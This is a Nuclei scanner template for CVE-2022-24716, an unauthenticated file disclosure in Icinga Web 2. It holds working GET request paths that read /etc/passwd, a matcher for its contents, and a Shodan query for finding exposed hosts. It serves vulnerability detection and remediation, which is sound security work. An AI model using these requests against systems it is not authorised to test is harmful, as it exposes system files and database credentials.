nuclei-templates/http/cves/2022/CVE-2022-24716.yaml

54 lines
1.8 KiB
YAML
Raw Normal View History

2023-05-08 17:24:19 +00:00
id: CVE-2022-24716
info:
name: Icinga Web 2 - Arbitrary File Disclosure
author: DhiyaneshDK
2023-05-08 17:26:05 +00:00
severity: high
description: |
Icinga Web 2 is an open source monitoring web interface, framework and command-line interface. Unauthenticated users can leak the contents of files of the local system accessible to the web-server user, including `icingaweb2` configuration files with database credentials.
2023-05-08 17:24:19 +00:00
reference:
- https://github.com/JacobEbben/CVE-2022-24716/blob/main/exploit.py
2023-07-11 19:49:27 +00:00
- http://packetstormsecurity.com/files/171774/Icinga-Web-2.10-Arbitrary-File-Disclosure.html
- https://github.com/Icinga/icingaweb2/commit/9931ed799650f5b8d5e1dc58ea3415a4cdc5773d
- https://github.com/Icinga/icingaweb2/security/advisories/GHSA-5p3f-rh28-8frw
- https://security.gentoo.org/glsa/202208-05
remediation: This issue has been resolved in versions 2.9.6 and 2.10 of Icinga Web 2. Database credentials should be rotated.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-24716
cwe-id: CWE-22
epss-score: 0.32737
cpe: cpe:2.3:a:icinga:icinga_web_2:*:*:*:*:*:*:*:*
2023-05-08 17:24:19 +00:00
metadata:
max-request: 3
shodan-query: title:"Icinga"
2023-07-11 19:49:27 +00:00
vendor: icinga
product: icinga_web_2
2023-07-12 11:56:50 +00:00
tags: packetstorm,cve,cve2023,icinga,lfi
2023-05-08 17:24:19 +00:00
2023-05-10 19:00:35 +00:00
http:
2023-05-08 17:24:19 +00:00
- method: GET
path:
- "{{BaseURL}}/lib/icinga/icinga-php-thirdparty/etc/passwd"
- "{{BaseURL}}/icinga2/lib/icinga/icinga-php-thirdparty/etc/passwd"
- "{{BaseURL}}/icinga-web/lib/icinga/icinga-php-thirdparty/etc/passwd"
stop-at-first-match: true
2023-07-11 19:49:27 +00:00
2023-05-08 17:24:19 +00:00
matchers-condition: and
matchers:
- type: word
part: header
words:
- text/plain
2023-07-11 19:49:27 +00:00
- type: regex
part: body
regex:
- "root:.*:0:0:"
2023-05-08 17:24:19 +00:00
- type: status
status:
- 200